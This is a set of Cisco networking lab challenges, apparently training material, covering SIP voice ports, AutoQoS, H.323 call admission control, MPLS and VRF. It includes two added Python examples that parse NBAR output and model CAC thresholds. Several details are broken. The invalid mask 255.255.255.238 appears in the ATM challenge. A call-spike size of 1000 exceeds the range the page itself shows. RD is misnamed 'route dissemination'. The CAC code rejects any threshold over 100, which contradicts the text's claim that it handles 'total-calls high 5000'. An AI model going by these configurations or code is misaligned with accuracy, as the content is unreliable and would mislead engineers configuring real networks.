This challenge involves the configuration of SIP with a Cisco SIP Gateway FXO setup. Some routers have Foreign Exchange Station (FXS) interfaces, which can connect to a standard telephone, fax machine, or similar device and thus must provide ringing, voltage supplies, and a dial tone. Normally the FXS interface uses an RJ-11 connector to connect to telephone equipment.
Objectives
The objectives of this challenge are to:

Define SIP details.
Define the voice port settings.

Outline
> enable
# sh version
# config t
(config)# sip-ua
(config-sip-ua)# ?
(config-sip-ua)# exit
(config)# voice-port 1/0/0
(config-voiceport)# description testing
(config-voiceport)# input gain 8
(config-voiceport)# caller-id enable
(config-voiceport)# exit
(config)# dial-peer voice 200 voip
(config-dial-peer)# exit
(config)# gateway

Example
> enable
# sh version
Cisco IOS Software, C2600 Software (C2600-ADVENTERPRISEK9-M), Version 12.4(12), RELEASE SOFTWARE (fc1)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2006 by Cisco Systems, Inc.
Compiled Fri 17-Nov-06 11:18 by prod_rel_team

ROM: System Bootstrap, Version 12.2(7r) [cmong 7r], RELEASE SOFTWARE (fc1)
Router uptime is 5 hours, 38 minutes
System returned to ROM by power-on
System image file is "flash:c2600-testk9-mz.124-12.bin"
Cisco 2611XM (MPC860P) processor (revision 1.0) with 111616K/19456K bytes of memory.
Processor board ID JAD07130QPE
M860 processor: part number 5, mask 2
2 FastEthernet interfaces
2 Serial(sync/async) interfaces
2 Voice FXO interfaces
2 Voice FXS interfaces
32K bytes of NVRAM.
49152K bytes of processor board System flash (Read/Write)
Configuration register is 0x3162
# config t
(config)# sip-ua
(config-sip-ua)# ?
SIP UA configuration commands:
aaa                  sip-ua AAA related configuration
authentication       Digest Authentication Configuration
calling-info         Specify treatment of calling information
default              Set a command to its defaults
disable-early-media  Disable early-media cut through
exit                 Exit from sip-ua configuration mode
max-forwards         Change number of max-forwards for SIP Methods
mwi-server           Configure a mwi Server
nat                  Enable NAT(Network Address Traversal) settings for the
                     SIP User Agent
no                   Negate a command or set its defaults
notify               SIP Signaling Notify Configuration
offer                Configure settings for Offers made from the Gateway
reason-header        Configure settings for supporting SIP Reason Header
redirection          Enable call redirection (3xx) handling
registrar            Configure SIP registrar VoIP Interface
remote-party-id      Enable Remote-Party-ID support in SIP User Agent
retry                Change default retries for each SIP Method
set                  Sets the PSTN cause to SIP status code (and vice versa)
                     and sets the PSTN cause to SIP requests
sip-server           Configure a SIP Server Interface
srv                  DNS SRV Query Type
suspend-resume       Enable support for ISDN SUSPEND/RESUME
timers               SIP Signaling Timers Configuration
transport            Enable SIP UA transport for TCP/UDP
(config-sip-ua)# exit
(config)# voice-port ?
<1-1> Voice interface slot
(config)# voice-port 1/0/0
(config-voiceport)# ?
Voice-port configuration commands:
battery-reversal     Enable FXS battery-reversal generation
bearer-cap           Specify the bear capability
busyout              Configure busyout trigger event & procedure
caller-id            Configure port caller id parameters
comfort-noise        Use fill-silence option
connection           Specify Trunking Parameters
cptone               Configure voice call progress tone locale
default              Set a command to its defaults
description          Description of what this port is connected to
disc_pi_off          close voice path when disconnect with PI received
disconnect-ack       FXS sending disconnect acknowledge
echo-cancel          Echo-cancellation option
exit                 Exit from voice-port configuration mode
impedance            Specifies the terminating impedance of the interface
input                Configure input gain for voice
music-threshold      Threshold for Music on Hold
mwi                  Enable MWI on this port
no                   Negate a command or set its defaults
non-linear           Use non-linear processing during echo cancellation
output               Configure output attenuation for voice
playout-delay        Configure voice playout delay buffer
ren                  Ringer Equivalence Number
ring                 Ring frequency Parameters
shutdown             Take voice-port offline
signal               The signaling type for the interface FXS or FXO
snmp                 Modify SNMP voice port parameters
station-id           Configure station ID
supervisory          Configure supervisory disconnect lcfo
threshold            Threshold [noise] for voice port
timeouts             Configure voice timeout parameters
timing               Configure voice timing parameters
translate            Translation rule
translation-profile  Translation profile
trunk-group          Configure interface to be in a trunk group
voice-class          Set voiceport voice class control parameters
(config-voiceport)# description ?
LINE  A string (up to 64 characters) describing the port connection (e.g. pbx1)
(config-voiceport)# description testing
(config-voiceport)# input ?
gain Configure gain in db for voice input
(config-voiceport)# input gain ?
<-6 - 14> gain in db
(config-voiceport)# input gain 8
(config-voiceport)# caller-id ?
alerting     Define caller id alerting method
attenuation  Configure caller id tx attenuation
block        Block the caller id of the calls made from this port
enable       Enable caller id on this port
format       Change caller id format
(config-voiceport)# caller-id enable
(config-voiceport)# exit
(config)# dial-peer ?
cor         Class of Restriction
hunt        Define the dial peer hunting choice
outbound    Define the outbound options
terminator  Define the address terminate character
voice       Voice type
(config)# dial-peer voice ?
<1-2147483647>  Voice dial-peer tag
(config)# dial-peer voice 200 ?
mmoip  Multi Media Over IP
pots   Telephony
voatm  Voice over ATM
vofr   Voice over Frame Relay
voip   Voice over IP
(config)# dial-peer voice 200 voip
(config-dial-peer)# ?
DIALPEER configuration commands:
acc-qos                The Minimally Acceptable Quality of Service to be
                       used in getting to this peer
answer-address         The Call Destination Number
application            The selected application
call                   Per Voip dial-peer Call configuration
call-block             Incoming Call Blocking
carrier-id             Configure Carrier ID
clid                   Caller ID option
codec                  The codec rate to be attempted in getting to this peer
corlist                set the Class of Restriction lists
default                Set a command to its defaults
description            Dialpeer specific description
destination-pattern    A full E.164 telephone number prefix
dnis-map               The name of a configured dnis-map
dtmf-relay             Transport DTMF digits across IP link
exit                   Exit from dial-peer configuration mode
expect-factor          Expectation Factor of voice quality
fax                    Configure fax
fax-relay              fax-relay options
huntstop               Stop hunting on Dial-Peers
icpif                  Calculated Planning Impairment Factor
incoming               Incoming called number
ip                     Set ip packet options
max-conn               Sets the maximum connections per peer, negation sets
                       to unlimited
max-redirects          Configure the max number of redirects for this
                       dialpeer
modem                  Modem commands through this peer
no                     Negate a command or set its defaults
numbering-type         The calling/called party numbering type
permission             set the call orig/term permission of this dialpeer
playout-delay          Configure voice playout delay buffer
preference             Configure the preference order of this dialpeer
req-qos                The desired Quality of Service to be used in
                       getting to this peer
roaming                Use roaming server
rtp                    RTP config
session                The session [ target | protocol | transport ] for this
                       peer
settle-call            Use settlement server
shutdown               Change the Admin State of this peer to down (no->up)
signal-type            The signaling type to be used when getting to this
                       peer
signaling              Signaling payload handling
snmp                   Modify SNMP voice peer parameters
supplementary-service  Config supplementary service features
tech-prefix            The H.323 gateway technology prefix
tone                   Generate tones
translate-outgoing     Translation rule
translation-profile    Translation profile
trunk-group-label      Configure Trunk Group Label
trunkgroup             trunk groups associated with this peer
vad                    Use VoiceActivityDetection as necessary option
voice                  Configure GATEWAY dial-peer for voice services
voice-class            Set Dial-peer voice class control parameters
(config-dial-peer)# exit
(config)# gateway
(config-gateway)# ?
GATEWAY configuration commands:
default   Set a command to its defaults
emulate   Gateway emulation configuration
exit      Exit from gateway configuration mode
no        Negate a command or set its defaults
security  Gateway security configuration
timer     Gateway-wide timers

Cisco CCVP Test 6

VoIP Signalling and Call Control

The most up-to-date version of this test is at:
http://networksims.com/v06.html

Cisco Router Challenge 134

Outline
This challenge involves the configuration of Auto QoS on an interface.
Objectives
The objectives of this challenge are to:

Define CEF (Cisco Express Forwarding), as this is required for Auto QoS.
Enable NBAR (Network Based Application Recognition), as this is required for Auto QoS.
Define the bandwidth on an interface.
Enable Auto QoS.

Example
> en
# config t
(config)# ip cef
(config)# int s0
(config-if)# bandwidth ?
<1-10000000>  Bandwidth in kilobits
inherit       Specify how bandwidth is inherited
(config-if)# bandwidth 256
(config-if)# ip nbar ?
protocol-discovery Enable NBAR protocol discovery
(config-if)# ip nbar protocol ?
<cr>
(config-if)# ip nbar protocol
(config-if)# auto ?
qos Configure AutoQoS
(config-if)# auto qos ?
voip Configure AutoQoS for VoIP
(config-if)# auto qos voip ?
trust Trust the DSCP marking
<cr>
(config-if)# auto qos voip
(config-if)# exit
(config)# exit
# sh ip nbar pr
Serial0/0

                          Input                                  Output
Protocol                  Packets    Bytes    5 min rate (bps)  Packets    Bytes    5 min rate (bps)
------------------------  ---------  -------  ----------------  ---------  -------  ----------------
bgp                       0          0        0                 0          0        0
citrix                    0          0        0                 0          0        0
cuseeme                   0          0        0                 0          0        0
custom-01                 0          0        0                 0          0        0
custom-02                 0          0        0                 0          0        0
custom-03                 0          0        0                 0          0        0
custom-04                 0          0        0                 0          0        0
custom-05                 0          0        0                 0          0        0
custom-06                 0          0        0                 0          0        0
custom-07                 0          0        0                 0          0        0
custom-08                 0          0        0                 0          0        0
custom-09                 0          0        0                 0          0        0
custom-10                 0          0        0                 0          0        0
dhcp                      0          0        0                 0          0        0
dns                       0          0        0                 0          0        0
egp                       0          0        0                 0          0        0
eigrp                     0          0        0                 0          0        0
exchange                  0          0        0                 0          0        0
fasttrack                 0          0        0                 0          0        0
finger                    0          0        0                 0          0        0
ftp                       0          0        0                 0          0        0
gnutella                  0          0        0                 0          0        0
gopher                    0          0        0                 0          0        0
gre                       0          0        0                 0          0        0
http                      0          0        0                 0          0        0
icmp                      0          0        0                 0          0        0
imap                      0          0        0                 0          0        0
ipinip                    0          0        0                 0          0        0
ipsec                     0          0        0                 0          0        0
irc                       0          0        0                 0          0        0
kazaa2                    0          0        0                 0          0        0
kerberos                  0          0        0                 0          0        0
l2tp                      0          0        0                 0          0        0
ldap                      0          0        0                 0          0        0
napster                   0          0        0                 0          0        0
netbios                   0          0        0                 0          0        0
netshow                   0          0        0                 0          0        0
nfs                       0          0        0                 0          0        0
nntp                      0          0        0                 0          0        0
notes                     0          0        0                 0          0        0
novadigm                  0          0        0                 0          0        0
ntp                       0          0        0                 0          0        0
pcanywhere                0          0        0                 0          0        0
pop3                      0          0        0                 0          0        0
pptp                      0          0        0                 0          0        0
printer                   0          0        0                 0          0        0
rcmd                      0          0        0                 0          0        0
rip                       0          0        0                 0          0        0
rsvp                      0          0        0                 0          0        0
rtp                       0          0        0                 0          0        0
rtspplayer                0          0        0                 0          0        0
secure-ftp                0          0        0                 0          0        0
secure-http               0          0        0                 0          0        0
secure-imap               0          0        0                 0          0        0
secure-irc                0          0        0                 0          0        0
secure-ldap               0          0        0                 0          0        0
secure-nntp               0          0        0                 0          0        0
secure-pop3               0          0        0                 0          0        0
secure-telnet             0          0        0                 0          0        0
smtp                      0          0        0                 0          0        0
snmp                      0          0        0                 0          0        0
socks                     0          0        0                 0          0        0
sqlnet                    0          0        0                 0          0        0
sqlserver                 0          0        0                 0          0        0
ssh                       0          0        0                 0          0        0
streamwork                0          0        0                 0          0        0
sunrpc                    0          0        0                 0          0        0
syslog                    0          0        0                 0          0        0
telnet                    0          0        0                 0          0        0
tftp                      0          0        0                 0          0        0
vdolive                   0          0        0                 0          0        0
xwindows                  0          0        0                 0          0        0
unknown                   0          0        0                 0          0        0
Total                     0          0        0                 0          0        0

Explanation
Key facts:
CCNP Objective: QoS Implementation Methods.

AutoQoS for the Enterprise is the next generation of automatic QoS generation, and uses NBAR
for traffic discovery and classification. The basic form of Auto QoS is Auto QoS VoIP.
For Auto QoS to work, CEF and NBAR must be enabled. The bandwidth must also be
correctly defined on the interface.
AutoQoS automatically generates the QoS commands.
AutoQoS analyzes network traffic and tries to optimize the QoS by using the traffic classes
found by AutoQoS Discovery to create policies, which are then applied to the
interface(s).
AutoQoS simplifies the configuration.
AutoQoS uses: Classification (AutoQoS Discovery uses NBAR to discover the
requirements); Policy generation (access-lists, class-maps and policy-maps are generated to
optimize the setup); Configuration (the required interfaces are configured);
Monitoring and reporting (the operation is continually updated and reported on); and
Consistency (the same policy can be applied consistently across a range of devices).
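Because AutoQoS Discovery builds its classes from the NBAR counters, it is worth being able to read the protocol-discovery listing programmatically, for instance to check which protocols actually carry traffic before trusting the generated policy. The Python below is an added example, not NetworkSims code or a Cisco tool: it parses the router's native `show ip nbar protocol-discovery` layout, where each protocol occupies three lines (packet count, byte count, 5-minute bit rate) under the Input and Output columns, and reports the active protocols. The SAMPLE text is constructed for the example.

```python
"""Parse 'show ip nbar protocol-discovery' output and report active protocols.

Added example, not NetworkSims code. SAMPLE is constructed in the router's
native layout: each protocol occupies three lines (packet count, byte count,
5-minute bit rate) under Input and Output columns.
"""
import re
from dataclasses import dataclass

SAMPLE = """\
 Serial0/0

                            Input                    Output
   Protocol                 Packet Count             Packet Count
                            Byte Count               Byte Count
                            5 minute bit rate (bps)  5 minute bit rate (bps)
   ------------------------ ------------------------ ------------------------
   http                     316773                   10
                            26340105                 600
                            3000                     0
   rtp                      0                        124500
                            0                        24900000
                            0                        64000
   unknown                  12                       0
                            900                      0
                            0                        0
   Total                    316785                   124510
                            26341005                 24900600
                            3000                     64000
"""


@dataclass
class ProtoStats:
    protocol: str
    in_packets: int
    out_packets: int
    in_bytes: int = 0
    out_bytes: int = 0
    in_bps: int = 0
    out_bps: int = 0


# First line of a protocol group: name followed by the two packet counts.
_ROW = re.compile(r"^\s*([A-Za-z][\w.-]*)\s+(\d+)\s+(\d+)\s*$")
# Second and third lines: the two byte counts, then the two bit rates.
_CONT = re.compile(r"^\s*(\d+)\s+(\d+)\s*$")
# An interface name on a line by itself, e.g. 'Serial0/0' or 'FastEthernet0/1'.
_IFACE = re.compile(r"[A-Za-z][A-Za-z-]*\d[\d/.:]*")


def parse_nbar(text):
    """Return {interface: [ProtoStats, ...]}; the 'Total' row is dropped."""
    result = {}
    iface = None
    current = None
    pending = []  # which fields the next continuation lines fill
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped:
            continue
        if _IFACE.fullmatch(stripped):
            iface = stripped
            result.setdefault(iface, [])
            continue
        m = _ROW.match(line)
        if m and iface is not None:
            current = ProtoStats(m.group(1), int(m.group(2)), int(m.group(3)))
            if current.protocol != "Total":
                result[iface].append(current)
            pending = ["bytes", "bps"]
            continue
        m = _CONT.match(line)
        if m and current is not None and pending:
            field = pending.pop(0)
            setattr(current, f"in_{field}", int(m.group(1)))
            setattr(current, f"out_{field}", int(m.group(2)))
    return result


def active_protocols(text, min_bps=1):
    """(interface, protocol, in_bps, out_bps) for rows carrying traffic."""
    found = []
    for iface, rows in parse_nbar(text).items():
        for r in rows:
            if max(r.in_bps, r.out_bps) >= min_bps:
                found.append((iface, r.protocol, r.in_bps, r.out_bps))
    return found


if __name__ == "__main__":
    for entry in active_protocols(SAMPLE):
        print("%-14s %-12s in %6d bps  out %6d bps" % entry)
```

Feed it the captured output of the command instead of SAMPLE to get the same per-interface list from a real router; the "unknown" row is the one to watch, since traffic NBAR cannot classify ends up in the default class of whatever policy AutoQoS generates.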

Cisco Switch Challenge 70


Outline
This challenge involves configuring Auto QoS on a switch.
Objectives
The objectives of this challenge are to:

Define Auto QoS

Example
> en
# config t
(config)# cdp run
(config)# int vlan 10

(config-vlan)# exit
(config)# int vlan 20
(config-vlan)# exit
(config)# int fa0/1
(config-if)# cdp enable
(config-if)# switchport ?
  access         Set access mode characteristics of the interface
  block          Disable forwarding of unknown uni/multi cast addresses
  broadcast      Set broadcast suppression level on this interface
  encapsulation  Set trunking encapsulation when interface is in trunking mode
  host           Set port host
  mode           Set trunking mode of the interface
  multicast      Set multicast suppression level on this interface
  native         Set trunking native characteristics when interface is in
                 trunking mode
  nonegotiate    Device will not engage in negotiation protocol on this
                 interface
  port-security  Security related command
  priority       Set appliance 802.1p priority
  protected      Configure an interface to be a protected port
  pruning        Set pruning VLAN characteristics when interface is in trunking
                 mode
  trunk          Set trunking characteristics of the interface
  unicast        Set unicast suppression level on this interface
  voice          Voice appliance attributes
  <cr>
(config-if)# switchport access vlan 10
(config-if)# switchport voice ?
  vlan  Vlan for voice traffic
(config-if)# switchport voice vlan ?
  <1-4094>  Vlan for voice traffic
  dot1p     Priority tagged on PVID
  none      Don't tell telephone about voice vlan
  untagged  Untagged on PVID
(config-if)# switchport voice vlan 20
(config-if)# au ?
  qos  Configure AutoQoS
(config-if)# auto qos ?
  voip  Configure AutoQoS for VoIP
(config-if)# auto qos voip ?
  cisco-phone  Trust the QoS marking of Cisco IP Phone
  trust        Trust the COS marking
(config-if)# auto qos voip cisco-phone
(config-if)# exit

Note:
For Auto QoS VoIP, CDP needs to be enabled.

Cisco Switch Challenge 226


Outline
This challenge involves configuring H.323 CAC (Call Admission Control).
Objectives
The objectives of this challenge are to:

Define H.323 CAC.

Commands
> en
# config t
(config)# call threshold interface e0
(config)# call threshold global cpu-avg low 10 high 50 busyout
(config)# call threshold global total-calls low 15 high 5000 busyout
(config)# call threshold global total-mem low 15 high 5000 busyout
(config)# call threshold global io-mem low 15 high 5000 busyout
(config)# call spike 20 steps 10 size 1000
(config)# call treatment on
(config)# call treatment action hairpin

Example
> en
# config t
(config)# call thres ?
  global         the global resources of this gateway
  interface      interface triggers for this gateway
  poll-interval  the poll interval for some resources
(config)# call threshold interface e0
(config)# call thres ?
  global         the global resources of this gateway
  interface      interface triggers for this gateway
  poll-interval  the poll interval for some resources
(config)# call th g ?
  cpu-5sec     the CPU utilization in the last 5 seconds
  cpu-avg      the average CPU utilization
  io-mem       the IO memory utilization
  proc-mem     the Processor memory utilization
  total-calls  the total number of calls
  total-mem    the total memory utilization

(config)# call th g cpu-avg ?
  low  the low threshold
(config)# call th g cpu-avg l ?
  <1-100>  low threshold in %
(config)# call th g cpu-avg l 15 ?
high the high threshold
(config)# call th g cpu-avg l 15 h ?
<1-100> high threshold in %
(config)# call th g cpu-avg l 15 h 50 ?
  busyout    busyout the voice interfaces if out-of-resource
  treatment  apply out-of-resource to call treatment
  <cr>
(config)# call threshold global cpu-avg low 15 high 50 busyout
(config)# call threshold global total-calls low 15 high 5000 busyout
(config)# call threshold global total-mem low 15 high 5000 busyout
(config)# call threshold global io-mem low 15 high 5000 busyout
(config)# call spike ?
<1-2147483647> Incoming call numbers for spiking threshold
(config)# call spike 1 ?
steps number of steps for spiking sliding window
<cr>
(config)# call spike 1 s ?
<3-10> number of steps
(config)# call spike 1 s 3 ?
size step size in millisecond
(config)# call spike 1 s 3 s ?
<100-250> millisecond
(config)# call spike 1 s 3 s 1000 ?
<cr>
(config)# call spike 20 steps 10 size 1000
(config)# call treat ?
  action       Action to take when call treatment is triggered
  cause-code   Select the cause code for disconnection
  isdn-reject  Select the ISDN reject cause-code
  on           toggle deny on/off
(config)# call treatment on
(config)# call treat a ?
  hairpin  Hairpin
  playmsg  play the selected message
  reject   Disconnect the call and pass down cause code
(config)# call treatment action hairpin
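The two mechanisms configured in this challenge behave differently, and that difference is the point of call admission control: a resource threshold with a low and a high value acts with hysteresis (once busied out above "high", the gateway stays out until the resource drops below "low"), while the spike check counts arrivals in a sliding window of steps x size milliseconds and treats an excess as a spike that the call treatment handles (hairpin here). The Python below is an added example, my own model rather than NetworkSims or Cisco code, of those two checks as I read the commands; the sample loads and arrival times are constructed, and the exact comparison at the boundaries (strictly above high, strictly below low) is an assumption.

```python
"""Model of the two CAC checks configured above: resource thresholds with
low/high hysteresis and call-spike detection over a sliding window.

Added example, not NetworkSims code. The semantics are my reading of the
commands: 'call threshold global <res> low L high H busyout' busies the
gateway out once the resource exceeds H and clears it once the resource
drops below L; 'call spike N steps S size M' counts arrivals in a window
of S steps of M milliseconds and treats more than N arrivals as a spike.
'call treatment action hairpin' is modelled as the answer "hairpin".
All sample measurements are constructed.
"""
from collections import deque


class ResourceThreshold:
    """One 'call threshold global' resource (cpu-avg, total-calls, ...)."""

    def __init__(self, low, high):
        # The CLI accepts <1-100> for both; low must sit below high.
        if not (1 <= low < high <= 100):
            raise ValueError("need 1 <= low < high <= 100")
        self.low, self.high = low, high
        self.busyout = False

    def update(self, utilisation):
        """Feed one poll (percent); return the new busyout state."""
        if utilisation > self.high:
            self.busyout = True
        elif utilisation < self.low:
            self.busyout = False
        # Between low and high the state is left alone: hysteresis.
        return self.busyout


def run_threshold(low, high, samples):
    """Busyout state after each sample, for a fresh threshold."""
    t = ResourceThreshold(low, high)
    return [t.update(s) for s in samples]


class SpikeDetector:
    """'call spike <calls> steps <steps> size <ms>' as a sliding window."""

    def __init__(self, calls, steps, size_ms):
        self.limit = calls
        self.window_ms = steps * size_ms
        self.arrivals = deque()  # timestamps (ms) of calls still in the window

    def call_arrived(self, now_ms):
        """Record an arrival; True if the window now holds more than the limit."""
        self.arrivals.append(now_ms)
        while self.arrivals and now_ms - self.arrivals[0] >= self.window_ms:
            self.arrivals.popleft()
        return len(self.arrivals) > self.limit


def admit(threshold, spike, now_ms, utilisation):
    """Decide one incoming call: 'accept', or 'hairpin' when CAC rejects it."""
    busied_out = threshold.update(utilisation)
    spiking = spike.call_arrived(now_ms)
    return "hairpin" if (busied_out or spiking) else "accept"


if __name__ == "__main__":
    cpu = ResourceThreshold(15, 50)        # low 15 high 50, the page's values
    spikes = SpikeDetector(20, 10, 1000)  # 20 calls in 10 x 1000 ms
    for t, load in [(0, 30), (100, 60), (200, 40), (300, 10)]:
        print(t, load, admit(cpu, spikes, t, load))
```

The hysteresis is what keeps a gateway from flapping in and out of busyout when the CPU hovers around a single threshold; the "total-calls low 15 high 5000" line in the challenge would, in this model, busy the gateway out above 5000 calls and only release it again once the count fell below 15.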

Cisco CCVP Test 7


Improving and Maintaining Voice Quality
The most up-to-date version of this test is at:
http://networksims.com/v07.html


24 MPLS
Cisco MPLS
MPLS Introduction
The most up-to-date version of this test is at:
http://networksims.com/i01.html

Cisco Router Challenge 227


Outline
This challenge involves basic frame-mode MPLS configuration.
Objectives
The objectives of this challenge are to:

Enable CEF globally.
Enable CEF on S0.
Define IGP routing protocol.
Assign LDP router ID.
Enable IPv4 MPLS on an interface (mpls ip).

Commands
> enable
# config t
(config)# ip cef
(config)# int s0
(config-if)# ip address 138.199.17.1 255.255.255.248
(config-if)# ip route-cache cef
(config-if)# mpls ip
(config-if)# exit
(config)# router ospf 101
(config-router)# network 10.0.0.0 0.0.0.255 area 1
(config)# mpls ldp router-id loopback5
(config)# int loopback5
(config-if)# ip address 138.199.17.2 255.255.255.248


Example
> enable
# config t
(config)# ip cef
(config)# int s0
(config-if)# ip address 138.199.17.1 255.255.255.248
(config-if)# ip route- ?
  cef             Enable Cisco Express Forwarding
  flow            Enable Flow fast-switching cache
  policy          Enable fast-switching policy cache for outgoing packets
  same-interface  Enable fast-switching on the same interface
  <cr>
(config-if)# ip route-cache cef
(config-if)# mpls ?
  accounting   Enable MPLS accounting on this interface
  ip           Configure dynamic MPLS forwarding for IP
  label        Label properties
  ldp          Configure Label Distribution Protocol (LDP) parameters
  mtu          Set tag switching Maximum Transmission Unit
  netflow      Configure Egress Netflow Accounting
  traffic-eng  Configure Traffic Engineering parameters
(config-if)# mpls ip
(config-if)# exit
(config)# router ospf 101
(config-router)# network 10.0.0.0 0.0.0.255 area 1
(config-router)# exit
(config)# mpls ?
  atm          Configure ATM options
  ip           Dynamic MPLS forwarding for IP
  ipv6         Dynamic MPLS forwarding for IPv6
  label        Label properties
  ldp          Label Distribution Protocol
  static       Configure static label bindings
  traffic-eng  Configure Traffic Engineering parameters
(config)# mpls ldp ?
  advertise-labels  Label advertisements
  atm               Configure ATM MPLS options
  backoff           Set LDP session backoff parameters
  discovery         LDP discovery
  explicit-null     Advertise Explicit Null label in place of Implicit Null
  graceful-restart  Configure LDP Graceful Restart
  holdtime          LDP session holdtime
  igp               Configure IGP-related LDP parameters
  logging           Enable LDP logging
  loop-detection    Enable LDP Loop Detection
  maxhops           Limit hop count for LDP LSP setup
  neighbor          Configure neighbor parameters
  path-vector       Path Vector for LDP LSP setup
  request-labels    Access list to specify valid downstream on demand
                    destinations.
  router-id         Select interface to prefer for LDP identifier address
  session           Configure session parameters
  tcp               Set TCP parameters for LDP
(config)# mpls ldp router-id ?
  Async              Async interface
  BVI                Bridge-Group Virtual Interface
  CDMA-Ix            CDMA Ix interface
  CTunnel            CTunnel interface
  Dialer             Dialer interface
  Ethernet           IEEE 802.3
  FastEthernet       FastEthernet IEEE 802.3
  Group-Async        Async Group interface
  Lex                Lex interface
  Loopback           Loopback interface
  MFR                Multilink Frame Relay bundle interface
  Multilink          Multilink-group interface
  Null               Null interface
  Port-channel       Ethernet Channel of interfaces
  Serial             Serial
  TokenRing          IEEE 802.5
  Tunnel             Tunnel interface
  Vif                PGM Multicast Host interface
  Virtual-PPP        Virtual PPP interface
  Virtual-Template   Virtual Template interface
  Virtual-TokenRing  Virtual TokenRing
(config)# mpls ldp router-id loopback5
(config)# int loopback5
(config-if)# ip address 138.199.17.2 255.255.255.248

Cisco Router Challenge 228


Outline
This challenge involves configuration of MPLS over a routed PVC in ATM.
Objectives
The objectives of this challenge are to:

Enable CEF globally.
Enable MPLS on ATM.
Define ATM interface parameters.
Define ATM sub-interface.

Commands
> enable
# config t
(config)# ip cef
(config)# int loopback5
(config-if)# ip address 138.199.17.2 255.255.255.248
(config-if)# exit
(config)# int atm0
(config-if)# ip address 138.199.17.1 255.255.255.248
(config)# int atm0.1 point-to-point
(config-subif)# ip address 138.10.11.1 255.255.255.238
(config-subif)# mpls ip
(config-subif)# pvc 2/100
(config-if-atm-vc)# encapsulation aal5snap
(config-if-atm-vc)# exit
(config-if)# exit
(config)# router ospf 101
(config-router)# network 10.0.0.0 0.0.0.255 area 1

Example
> enable
# config t
(config)# ip cef
(config)# int loopback5
(config-if)# ip address 138.199.17.2 255.255.255.248
(config-if)# exit
(config)# int atm0
(config-if)# ip address 138.199.17.1 255.255.255.248
(config)# int atm0.1 ?
  mpls            Treat as an MPLS link
  multipoint      Treat as a multipoint link
  point-to-point  Treat as a point-to-point link
  tag-switching   Treat as a tag switching link (obsolete, use mpls)
  <cr>
(config)# int atm0.1 point-to-point
(config-subif)# ip address 138.10.11.1 255.255.255.238
(config-subif)# mpls ?
  atm          Tag controlled ATM parameters
  ip           Configure dynamic MPLS forwarding for IP
  label        Label properties
  ldp          Configure Label Distribution Protocol (LDP) parameters
  mtu          Set tag switching Maximum Transmission Unit
  netflow      Configure Egress Netflow Accounting
  traffic-eng  Configure Traffic Engineering parameters
(config-subif)# mpls ip
(config-subif)# pvc ?
  <0-7>     Enter VPI/VCI value(slash required)
  <1-1023>  Enter VCI value
  WORD      Optional handle to refer to this connection
(config-subif)# pvc 2/100
(config-if-atm-vc)# encapsulation ?
  aal5ciscoppp  Cisco PPP over AAL5 Encapsulation
  aal5mux       AAL5+MUX Encapsulation
  aal5nlpid     AAL5+NLPID Encapsulation
  aal5snap      AAL5+LLC/SNAP Encapsulation
(config-if-atm-vc)# encapsulation aal5snap
(config-if)# exit
(config)# router ospf 101
(config-router)# network 10.0.0.0 0.0.0.255 area 1

Cisco MPLS
MPLS Basics
The most up-to-date version of this test is at:
http://networksims.com/i02.html


Cisco Router Challenge 229


Outline
This challenge involves an MPLS VPN configuration, which is often seen in ISP
applications, and uses MPLS forwarding and VRF (Virtual Routing and Forwarding). VRF is
used to create multiple instances of a routing table within the same router, at the same time.
Thus the same, or overlapping, IP addresses can be used without a conflict, as all of these
routing instances are independent. VRF uses Forwarding Information Bases (FIBs), which
are distinct routing tables. Within an MPLS domain, the Provider Edge (PE) routing switch is
the only device that has knowledge of the multiple virtual routing instances; the
Customer Edge (CE) devices then participate in their MPLS VPN routing via route
dissemination (RD) to and from the PE, using a routing protocol such as eBGP, OSPF or
static routing. The other Provider (P) switches in the backbone have no knowledge
of IP routing within this context, as the PE-to-PE traffic travels over the core network using label
switching. This challenge involves the configuration of the VRF on the PE routers, and the
next challenge sets up BGP PE-PE routing on the PE routers, which is required to transport the
routes over the backbone.
Objectives
The objectives of this challenge are to:

Configure VRF.
Configure RD (which is used to make a unique IP address).
Configure import and export policy (RT).
Associate VRF with an interface

Commands
> enable
# config t
(config)# ip cef
(config)# int loopback5
(config-if)# ip address 138.199.17.2 255.255.255.248
(config-if)# ip vrf forwarding Testing
(config-if)# exit
(config)# ip vrf Testing
(config-vrf)# rd 1:100
(config-vrf)# route-target both 1:100
(config)# int s0
(config-if)# ip address 138.199.17.1 255.255.255.248
(config-if)# ip vrf forwarding Testing
(config-if)# exit

Example


> enable
# config t
(config)# ip cef
(config)# int loopback5
(config-if)# ip address 138.199.17.2 255.255.255.248
(config-if)# ip vrf forwarding Testing
(config-if)# exit
(config)# ip vrf ?
WORD VPN Routing/Forwarding instance name
(config)# ip vrf Testing
(config-vrf)# ?
IP VPN Routing/Forwarding instance configuration commands:
  bgp           Commands pertaining to BGP
  context       Associate SNMP context with this vrf
  default       Set a command to its defaults
  description   VRF specific description
  exit          Exit from VRF configuration mode
  maximum       Set a limit
  mdt           Backbone Multicast Distribution Tree
  no            Negate a command or set its defaults
  rd            Specify Route Distinguisher
  route-target  Specify Target VPN Extended Communities
  vpn           Configure VPN ID as specified in rfc2685
(config-vrf)# rd 1:100
(config-vrf)# rd ?
  ASN:nn or IP-address:nn  VPN Route Distinguisher
(config-vrf)# route-target ?
  ASN:nn or IP-address:nn  Target VPN Extended Community
  both                     Both import and export Target-VPN community
  export                   Export Target-VPN community
  import                   Import Target-VPN community
(config-vrf)# route-target both ?
  ASN:nn or IP-address:nn  Target VPN Extended Community
(config-vrf)# route-target both 1:100
(config)# int s0
(config-if)# ip address 138.199.17.1 255.255.255.248
(config-if)# ip vrf ?
  forwarding  Configure forwarding table
  receive     Add Interface Address into VRF Table
  sitemap     Configure route-map for routes received from this site
(config-if)# ip vrf forwarding ?
  WORD  Table name
(config-if)# ip vrf forwarding Testing
(config-if)# exit

The RD value creates the routing and forwarding tables. It is added at the beginning of the
customer IP addresses to make them unique. It can take either of two forms:

16-bit AS number : 32-bit number. For example 1:100, which has an AS of 1 and a 32-bit
number of 100.
32-bit IP address : 16-bit number. For example 192.168.1.1:1, which has a 16-bit value of 1.

The VRF is associated with an interface with:
(config-if)# ip vrf forwarding Testing
